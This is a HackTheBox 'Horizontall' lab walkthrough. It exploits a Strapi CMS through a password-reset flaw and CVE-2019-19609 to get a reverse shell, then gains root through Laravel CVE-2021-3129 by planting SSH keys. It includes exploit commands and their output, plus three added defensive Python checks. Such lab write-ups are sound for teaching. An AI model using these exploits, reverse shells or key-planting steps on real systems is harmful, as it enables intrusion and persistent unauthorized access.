HackTheBox Horizontall
Horizontall
Foothold
nmap
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.105 -oN nmap.log
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Ports 22 and 80 are open.
web
vhost
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 2>/dev/null -o gobuster_vhost.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://horizontall.htb/
[+] Method: GET
[+] Threads: 150
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/29 22:09:23 Starting gobuster in VHOST enumeration mode
===============================================================
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]
===============================================================
2022/09/29 22:12:34 Finished
===============================================================
Found a new subdomain: api-prod.horizontall.htb
api-prod.horizontall.htb
The page shows nothing but the word "Welcome".
dir
Run directory enumeration against the new subdomain.
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir_prod.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://api-prod.horizontall.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/29 22:12:56 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 200) [Size: 854]
/Admin (Status: 200) [Size: 854]
/ADMIN (Status: 200) [Size: 854]
/favicon.ico (Status: 200) [Size: 1150]
/index.html (Status: 200) [Size: 413]
/reviews (Status: 200) [Size: 507]
/robots.txt (Status: 200) [Size: 121]
/users (Status: 403) [Size: 60]
===============================================================
2022/09/29 22:17:16 Finished
===============================================================
Several directories found.
admin
A login screen is displayed.
Inspecting the traffic, a request to /admin/init is also being sent.
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 29 Sep 2022 13:20:20 GMT
Vary: Origin
Content-Security-Policy: img-src 'self' http:; block-all-mixed-content
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Powered-By: Strapi <strapi.io>
{
"data":{
"uuid":"a55da3bd-9693-4a08-9279f9df57fd1817",
"currentEnvironment":"development",
"autoReload":false,
"strapiVersion":"3.0.0-beta.17.4"
}
}
The response body discloses the Strapi version.
Searching for vulnerabilities in that version turns up code on Exploit DB, so run it.
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ python3 50239.py http://api-prod.horizontall.htb
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit
[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY0NDU4NjgxLCJleHAiOjE2NjcwNTA2ODF9.ocIcsjf32a7JI4559q8wWlJdHQs5slkHVjpqXONF-m8
Exploit DB -> https://www.exploit-db.com/exploits/50239
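As an added example (my code, not part of the original writeup or of the Exploit DB script), here is a small Python check a defender can run against their own Strapi instances: it reads the same /admin/init response shown above, extracts strapiVersion and compares it against the cutoff the exploit banner later on this page states for CVE-2019-19609 ("3.0.0-beta.17.7 and earlier"). The version grammar handled by parse_version, the fetch_init helper and the sample body (constructed from the response above) are my assumptions.

```python
import json
import re
import urllib.request

# Constructed sample: the /admin/init response body shown in the writeup.
SAMPLE_INIT_BODY = """{
"data":{
"uuid":"a55da3bd-9693-4a08-9279f9df57fd1817",
"currentEnvironment":"development",
"autoReload":false,
"strapiVersion":"3.0.0-beta.17.4"
}
}"""

# Last affected release as stated by the exploit banner on this page:
# "strapi-3.0.0-beta.17.7 and earlier (CVE-2019-19609)".
LAST_AFFECTED = "3.0.0-beta.17.7"

# Assumed grammar: x.y.z with an optional -alpha/-beta/-rc.N[.M] suffix.
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|rc)\.(\d+)(?:\.(\d+))?)?$")


def parse_version(text):
    """Turn '3.0.0-beta.17.4' into a comparable tuple.

    A final release sorts after any pre-release of the same x.y.z, and
    alpha < beta < rc within the same x.y.z.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Strapi version string: {text!r}")
    major, minor, patch, stage, a, b = m.groups()
    stage_rank = {"alpha": 0, "beta": 1, "rc": 2, None: 3}[stage]
    return (int(major), int(minor), int(patch), stage_rank,
            int(a) if a else 0, int(b) if b else 0)


def strapi_version_from_init(body):
    """Extract data.strapiVersion from an /admin/init JSON body."""
    return json.loads(body)["data"]["strapiVersion"]


def is_affected(version, last_affected=LAST_AFFECTED):
    """True when the running version is at or below the stated cutoff."""
    return parse_version(version) <= parse_version(last_affected)


def assess(body):
    """Summarise what an unauthenticated /admin/init response gives away."""
    data = json.loads(body)["data"]
    version = data["strapiVersion"]
    return {
        "version": version,
        "affected": is_affected(version),
        # A non-production environment string is itself worth flagging.
        "environment": data.get("currentEnvironment"),
    }


def fetch_init(base_url, timeout=10):
    """Fetch /admin/init from one of your own instances (assumed helper)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/admin/init",
                                timeout=timeout) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    print(assess(SAMPLE_INIT_BODY))
```

The point for an operator is that /admin/init answers without authentication, so the version string it returns should be treated as public and tracked in an asset inventory; the check above can be fed from fetch_init over a list of your own hosts.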
It looks like it succeeded, so try logging in with the new credentials.
Login succeeded.
Right after logging in, the Users section caught my attention, but it yields nothing useful.
After resuming enumeration I also checked the Upload screen, but could not abuse it.
Shell as strapi
CVE-2019-19609
Since a JWT was obtained along with the password, use it to run the exploit.
GitHub -> https://github.com/diego-tella/CVE-2019-19609-EXPLOIT
┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2019-19609-EXPLOIT]
└─$ python exploit.py -d api-prod.horizontall.htb -jwt eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjY0NDU4NjgxLCJleHAiOjE2NjcwNTA2ODF9.ocIcsjf32a7JI4559q8wWlJdHQs5slkHVjpqXONF-m8 -l 10.10.14.12 -p 5555
[+] Exploit for Remote Code Execution for strapi-3.0.0-beta.17.7 and earlier (CVE-2019-19609)
[+] Remember to start listening to the port 5555 to get a reverse shell
[+] Sending payload... Check if you got shell
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.105] 43096
/bin/sh: 0: can't access tty; job control turned off
$ whoami
strapi
Foothold obtained.
user flag
strapi@horizontall:/home/developer$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
The file is owned by the developer user, but it is world-readable, so the flag can be read.
Privilege escalation
netstat
strapi@horizontall:~$ netstat -tulpn | grep LISTEN
netstat -tulpn | grep LISTEN
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1824/node /usr/bin/
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
Port 8000 is listening.
Since it is bound to 127.0.0.1, access it with curl from the box.
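Added example, not from the writeup: a Python parser for the netstat -tulpn output above that separates loopback-only listeners from externally exposed ones. Services bound to 127.0.0.1 (8000, 3306 and 1337 here) are unreachable from the network, but any local account, including a compromised service account such as strapi, can reach them, and they can be forwarded off-box with ssh -L as is done later on this page; they therefore need the same patching and authentication as anything internet-facing. The sample lines are copied from the output above; the column handling is my assumption about netstat's layout.

```python
# Constructed sample: the `netstat -tulpn | grep LISTEN` lines from the writeup.
SAMPLE_NETSTAT = """\
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1824/node /usr/bin/
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
"""


def split_addr(local):
    """Split 'host:port' where host may be IPv4, IPv6 (e.g. '::') or '*'."""
    host, _, port = local.rpartition(":")
    return host, int(port)


def is_loopback(host):
    """Loopback binds: 127.0.0.0/8 or ::1."""
    return host == "::1" or host.startswith("127.")


def parse_listeners(text):
    """Parse netstat -tulpn style lines into dicts; non-LISTEN lines are skipped.

    Assumed column order: Proto Recv-Q Send-Q Local Foreign State PID/Program.
    The PID/Program column is '-' when the caller may not read that process.
    """
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[5] != "LISTEN":
            continue
        host, port = split_addr(parts[3])
        program = " ".join(parts[6:]) if len(parts) > 6 else "-"
        listeners.append({
            "proto": parts[0],
            "host": host,
            "port": port,
            "loopback": is_loopback(host),
            "program": program,
        })
    return listeners


def loopback_only_ports(text):
    """Ports that listen only on loopback and are not also exposed on a
    wildcard or external address."""
    listeners = parse_listeners(text)
    loop = {l["port"] for l in listeners if l["loopback"]}
    exposed = {l["port"] for l in listeners if not l["loopback"]}
    return sorted(loop - exposed)


def report(text):
    """Human-readable summary for a quick local review."""
    lines = []
    for l in parse_listeners(text):
        scope = "loopback" if l["loopback"] else "exposed "
        lines.append(f"{scope} {l['proto']:<4} {l['host']}:{l['port']} {l['program']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_NETSTAT))
    print("loopback-only:", loopback_only_ports(SAMPLE_NETSTAT))
```

On a hardened host, the ports this function returns are the ones to inventory and, where forwarding by unprivileged users is not needed, to pair with AllowTcpForwarding no in sshd_config so a shell as a low-privilege user does not turn them into network-reachable services.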
curl http://127.0.0.1:8000/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Laravel</title>
<head>
<a href="https://github.com/sponsors/taylorotwell" class="ml-1 underline">
Sponsor
</a>
</div>
</div>
<div class="ml-4 text-center text-sm text-gray-500 sm:text-right sm:ml-0">
Laravel v8 (PHP v7.4.18)
</div>
</html>
Laravel and PHP versions confirmed.
Searching GitHub for exploit code turns up a script that looks usable.
SSH
The exploit code apparently only works against localhost, so set up SSH port forwarding.
strapi@horizontall:~$ mkdir ./.ssh
mkdir ./.ssh
strapi@horizontall:~$ cd .ssh
cd .ssh
strapi@horizontall:~/.ssh$ echo "ssh-rsa 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 kali@kali" > authorized_keys
Place the public key on the server.
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ ssh -i /home/kali/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Sep 29 14:49:08 UTC 2022
System load: 0.0 Processes: 179
Usage of /: 82.3% of 4.85GB Users logged in: 0
Memory usage: 44% IP address for eth0: 10.10.11.105
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 4 11:29:42 2021 from 192.168.1.15
$ whoami
strapi
SSH connection succeeded.
Port 8000 is now reachable from the kali side at 127.0.0.1:8000.
Shell as root
exploit
With the setup complete, run the code.
GitHub -> https://github.com/nth347/CVE-2021-3129_exploit
┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "whoami"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited
root
[i] Trying to clear logs
[+] Logs cleared
The command executes and the output shows it runs as root.
This time, connect via SSH.
┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 "mkdir -p /root/.ssh"
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
Create the directory as before.
┌──(kali㉿kali)-[~/Desktop/Horizontall/CVE-2021-3129_exploit]
└─$ ./exploit.py http://localhost:8000 Monolog/RCE1 'echo "ssh-rsa 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 kali@kali" > /root/.ssh/authorized_keys'
[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[i] There is no output
[i] Trying to clear logs
[+] Logs cleared
Then write the public key as authorized_keys.
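The root takeover finishes by planting a public key in /root/.ssh/authorized_keys. As an added example (my code, not from the writeup or either exploit project), here is a Python audit that parses an authorized_keys file, computes the OpenSSH SHA256 fingerprint of every key and reports any key not on an allowlist. The sample file and both key blobs are constructed, not real keys, and the ALLOWLIST set, audit_file and the option-free line format it assumes are my assumptions.

```python
import base64
import hashlib
import struct


def _ssh_string(b):
    """Length-prefixed string as used in the SSH wire format."""
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(raw32):
    """Build a syntactically valid ssh-ed25519 blob from 32 arbitrary bytes
    (constructed sample material, not a usable key)."""
    return base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(raw32)).decode()


# Constructed sample authorized_keys: one key the admin manages and one
# planted key carrying a 'kali@kali' comment like the one in the writeup.
KNOWN_BLOB = make_ed25519_blob(bytes(range(32)))
PLANTED_BLOB = make_ed25519_blob(bytes(range(32, 64)))
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys managed by config management
ssh-ed25519 {KNOWN_BLOB} ops@bastion

ssh-ed25519 {PLANTED_BLOB} kali@kali
"""


def fingerprint(blob_b64):
    """OpenSSH-style fingerprint: 'SHA256:' + base64(sha256(raw blob)) without padding."""
    raw = base64.b64decode(blob_b64)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return (key_type, blob, comment) for each key line.

    Blank lines and '#' comments are skipped. Lines that start with options
    (e.g. command="...") are not handled by this assumed simple format.
    """
    keys = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if len(parts) < 2:
            continue
        key_type, blob = parts[0], parts[1]
        comment = parts[2] if len(parts) == 3 else ""
        keys.append((key_type, blob, comment))
    return keys


def unknown_keys(text, allowlist):
    """Keys whose fingerprint is absent from the allowlist, as
    (key_type, fingerprint, comment) tuples."""
    found = []
    for key_type, blob, comment in parse_authorized_keys(text):
        fp = fingerprint(blob)
        if fp not in allowlist:
            found.append((key_type, fp, comment))
    return found


# Assumed allowlist: fingerprints your key-management process knows about.
ALLOWLIST = {fingerprint(KNOWN_BLOB)}


def audit_file(path, allowlist=ALLOWLIST):
    """Audit a real authorized_keys file on disk (assumed helper)."""
    with open(path, encoding="utf-8") as fh:
        return unknown_keys(fh.read(), allowlist)


if __name__ == "__main__":
    for key_type, fp, comment in unknown_keys(SAMPLE_AUTHORIZED_KEYS, ALLOWLIST):
        print(f"UNKNOWN {key_type} {fp} {comment!r}")
```

Run periodically (or on file-change events) over /root/.ssh/authorized_keys and every user's ~/.ssh/authorized_keys, this turns a quiet persistence step into an alert; fingerprints rather than comments are compared because the comment field is free text an attacker can set to anything.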
┌──(kali㉿kali)-[~/Desktop/Horizontall]
└─$ ssh -i /home/kali/.ssh/id_rsa root@10.10.11.105
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Sep 29 15:08:45 UTC 2022
System load: 0.03 Processes: 183
Usage of /: 82.3% of 4.85GB Users logged in: 1
Memory usage: 44% IP address for eth0: 10.10.11.105
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Aug 23 11:27:49 2021 from 10.10.14.6
root@horizontall:~# whoami
root
Privilege escalation succeeded.
root flag
root@horizontall:~# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Flag obtained.
Thoughts
This was a fun box. Being able to confirm the Strapi version early made the whole path go smoothly. As for the final privilege escalation, there seem to be many other methods, so I would like to try several of them.